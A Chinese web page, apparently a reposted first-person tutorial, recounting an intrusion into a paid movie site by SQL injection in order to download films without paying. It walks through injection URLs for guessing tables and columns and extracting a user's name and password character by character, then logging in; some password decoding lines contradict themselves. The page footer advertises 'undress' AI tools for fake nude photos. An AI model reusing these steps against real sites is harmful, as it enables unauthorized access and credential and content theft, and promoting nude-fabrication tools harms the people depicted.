SQL注入网站入侵实例_MySQL
这几天闲得无聊,想上网Down几部电影来看,找了找都是要Money的,不爽,花时间跑去汇钱还不如找个有漏洞的黑一黑。于是,计划开始:
(为避免不必要的误会,网址、用户名、密码做了一些修改,不过方法是100%原汁原味)
1.寻找入口
准备:如果你以前没尝试过SQL注入攻击,那应该把HTTP友好提示关闭,这样才能让你清楚看到服务器端返回的提示信息。
尝试几个有传入参数的页面,逐个测试是否有SQL注入漏洞,识别方法为:把网址栏的ID=***x加个号,或在表单输入号,如果提示表达式错误,表示有漏洞可注入,另外,通过这个方式可以得到程序所用的数据库类型。
经测试,发现有几个页面有注入漏洞,决定从http://www.movie.com/movie.ASP?ID=1000入手,输入http://www.movie.com/movie.ASP?ID=1000,得到信息:数据库用是的ACCESS,提示ArticleID=1000附近有表达式错误,嘿,原来是个用文章系统改出来的电影站。
2.观察网站环境
网站提供的功能有:影片分类、影片介绍、影片搜索,影片的ID大概从1000-1500之间。
3.猜表名查清楚敌人情况之后,开始行动
行动的第一步都是从猜表名开始,http://www.movie.com/movie.ASP?ID=1000,把1000改成(select count(1) from user),那么,他原来的SQL语句将会变成:
Select [字段列表] from [影片表] where 影片ID=(select count(1) from user)
如果猜对表名,将有可能出现下面三种情况:
A.显示某部影片的信息(巧合的情况)
B.显示影片找不到(如果有判断是否为EOF)
C.提示错误信息(EOF OR BOF)
如果猜错,将会直接提示找不到表名。
把user,users,member,members,userlist,memberlist,userinfo,admin,manager,用户,yonghu这些常用表名一个个放进去试,一般成功率都不低于80%
结果,成功猜中该网站的用户名表名为users
4.猜列名
至于猜列名,不用我介绍大家都应该清楚怎么做了,把(select count(1) from users)改成(select count(id) from users),如没提示"找不到字段"就表示字段名是正确的,字段一般不用太费力,在Login的时候看看表单的名称就大概可以猜到一些了。
果然,这个网站也不例外,用户表中字段为ID(数字),UserID(文本),Password(文本),积分字段猜得比较费劲,为money
5.锁定目标
让users表只返回money最多的一个记录,以便进行猜解、并避免猜中一些没money的用户名:
http://www.movie.com/movie.ASP?ID=(select 1000 from user where money>1000) 结果:提示子查询不能返回两条以上记录
锁定>10000,提示不变;
锁定>100000,提示找不到记录,说明没有积分大于10万的用户;
从1万到10万逐步缩小范围,得知积分大于25500只有一条记录。
6.计算用户名及密码长度
因为影片的ID大概从1000-1500之间,可以用UserID的长度+1000得出的数(即影片ID)计算用户名长度,键入:
http://www.movie.com/movie.ASP?ID=(select len(UserID) %2B 1000 from user where money>25500)%2B是什么?因为地址栏的+号request出来会变成空格,所以+号要用UrlEncode过的%2B表示。结果返回片名为《双雄》的影片,呵呵,怎么办?不是有搜索功能吗?拿去搜一下,看看影片ID是多少吧。
搜索,得出影片ID是1006,显然,用户名长度为1006-1000=6;同样方法,得出密码的长度为8
7.分步破解用户名
有点SQL应用经验的人应该都想到方法了,来,敲入:
http://www.movie.com/movie.ASP?ID=(select asc(mid(UserID,1,1)) %2B 1000 from user where money>25500)
呵呵,又返回一部影片,搜索一下,影片ID为1104,即asc(mid(UserID,1,1))=104
同样方法,得出:
asc(mid(UserID,2,1))=117
asc(mid(UserID,3,1))=97
asc(mid(UserID,4,1))=106
asc(mid(UserID,5,1))=105
asc(mid(UserID,6,1))=101
因为len(UserID)=6,所以算到第6位就行了,查asc对应表(会编程的可以写几句话算出来),chr(104)=h,chr(117)=u,chr(97)=a,chr(106)=j,chr(105)=i,chr(101)=e
连起来,用户名就是huajie
8.同样的方法破解密码
asc(mid(Password,1,1))=49 => chr(49)=1
asc(mid(Password,2,1))=57 => chr(49)=9
asc(mid(Password,3,1))=55 => chr(49)=7
asc(mid(Password,4,1))=56 => chr(49)=8
asc(mid(Password,5,1))=48 => chr(49)=0
asc(mid(Password,6,1))=55 => chr(49)=7
asc(mid(Password,7,1))=55 => chr(49)=1
asc(mid(Password,8,1))=55 => chr(49)=2
拼起来:19780712,哈哈,又是用生日做密码的!
接下来,输入用户名和密码,登录系统,成功!猜表名列表之前用了30分钟,破解用了15分钟,45分钟搞掂了一个站。接下来做什么?当然是先Down几G的电影下来再说了。
Hot AI Tools
Undresser.AI Undress
AI-powered app for creating realistic nude photos
AI Clothes Remover
Online AI tool for removing clothes from photos.
Undress AI Tool
Undress images for free
Clothoff.io
AI clothes remover
Video Face Swap
Swap faces in any video effortlessly with our completely free AI face swap tool!
Hot Article
Hot Tools
Notepad++7.3.1
Easy-to-use and free code editor
SublimeText3 Chinese version
Chinese version, very easy to use
Zend Studio 13.0.1
Powerful PHP integrated development environment
Dreamweaver CS6
Visual web development tools
SublimeText3 Mac version
God-level code editing software (SublimeText3)
Hot Topics
How to solve the problem that Windows 11 prompts you to enter the administrator username and password to continue?
Apr 11, 2024 am 09:10 AM
When using Win11 system, sometimes you will encounter a prompt that requires you to enter the administrator username and password. This article will discuss how to deal with this situation. Method 1: 1. Click [Windows Logo], then press [Shift+Restart] to enter safe mode; or enter safe mode this way: click the Start menu and select Settings. Select "Update and Security"; select "Restart Now" in "Recovery"; after restarting and entering the options, select - Troubleshoot - Advanced Options - Startup Settings -&mdash
How to change your name on Instagram 14 days ago
Apr 16, 2023 pm 02:40 PM
In the early days of social media, you could change your profile name multiple times, but now changing your name on any social media app comes with its own set of restrictions. If you've been wanting to change your display name or username on Instagram, the post below will explain how often you can change them, how to do it, and what you can do when you can't change your name on the platform . How to change display name and username on Instagram? Instagram offers two places for your name - your display name and your username, and luckily you can change both easily in the mobile app. The display name is what you would normally enter true
Fix: Issues with Oobekeyboard Ooberegion Oobelocal oobe settings issues on Windows 11/10
Apr 17, 2023 am 09:01 AM
OOBE or out-of-box experience is a process designed for users to guide them through the various stages of post-installation steps. This includes rights and agreement pages, login pages, WiFi or network connection options, etc. If you receive any OOBEKeyboard, OOBELOCAL, or OOBEREGION issues, you will not be able to proceed to the final installation steps. Don't worry. There are some simple fixes you can use to resolve this issue. Workarounds - Before you do anything else, try these normal solutions - 1. When you get an error prompt, go ahead and click on the "Try Again" prompt. Keep trying at least 7 to 8 more times. 2. Check network connectivity. If you are using an Ethernet connection or Wi-Fi
How to get your Steam ID in a few steps?
May 08, 2023 pm 11:43 PM
Nowadays, many Windows users who love games have entered the Steam client and can search, download and play any good games. However, many users' profiles may have the exact same name, making it difficult to find a profile or even link a Steam profile to other third-party accounts or join Steam forums to share content. The profile is assigned a unique 17-digit id, which remains the same and cannot be changed by the user at any time, whereas the username or custom URL can. Regardless, some users don't know their Steamid, and it's important to know this. If you don't know how to find your account's Steamid, don't panic. In this article
How to fill in the user name of Railway 12306
Feb 23, 2024 pm 04:07 PM
How to fill in the user name of Railway 12306? You can fill in the user name in Railway 12306 APP, but most friends don’t know how to fill in the user name of Railway 12306. Next is the graphic tutorial on how to fill in the user name of Railway 12306 brought by the editor. , interested users come and take a look! Railway 12306 usage tutorial How to fill in the Railway 12306 username 1. First open the Railway 12306 APP and click [Register] at the bottom of the main page; 2. Then on the registration function page, enter the user name, password, confirmation password, etc.; 3. Finally enter Once completed, you can fill in the user registration.
What is the wifi username?
Mar 21, 2023 am 11:32 AM
The wifi username refers to the administrative username of the wireless router. This username, the IP address of the router, and the default administrative password are usually printed on the bottom of the wireless router and can also be found in the manual of the wireless router; the default administrative user of most routers The name is both admin, and the management password is also admin.
How to change username in Google Chrome
Apr 07, 2024 pm 02:40 PM
How to change username in Google Chrome? Nowadays, more and more people like to use Google Chrome. This browser can provide users with rich functions and services. Users can experience all the functions after logging in to their account. Many users just pick one when creating an account. Nickname, I believe everyone wants to know how to change the username later. This article will introduce to you the steps to quickly change your username on Google Chrome. You may wish to take a look and learn more. Introduction to the steps to quickly change the username in Google Chrome 1. In the first step, after we open Google Chrome, open the three vertical dot icons in the upper right corner of the page (as shown in the picture). 2. In the second step, after opening the three vertical dots icon, we click to open the "Settings" option in the menu list (as shown in the figure)
Huawei P70 directly starts the Pioneer Plan and is officially on sale
Apr 19, 2024 pm 01:58 PM
Zhongguancun News: On the morning of April 18, Huawei suddenly announced that the P70 series of mobile phones are officially on sale under the Pioneer Plan. Friends who want to buy should be prepared to take action. According to past practice, Huawei's flagship mobile phones are very popular and will always be out of stock. . This time the Huawei P70 series has been renamed Pura, which means pure. Previously, Huawei's Yu Chengdong said: Since 2012, Huawei's P series smartphones have been like loyal partners, accompanying hundreds of millions of users around the world to spend countless precious moments and jointly witness the beauty and excitement of life. He deeply felt that the trust and love given by every user who chooses Huawei's P series is tantamount to a powerful driving force, always inspiring Huawei to move forward firmly on the road of innovation. Pura means pure.
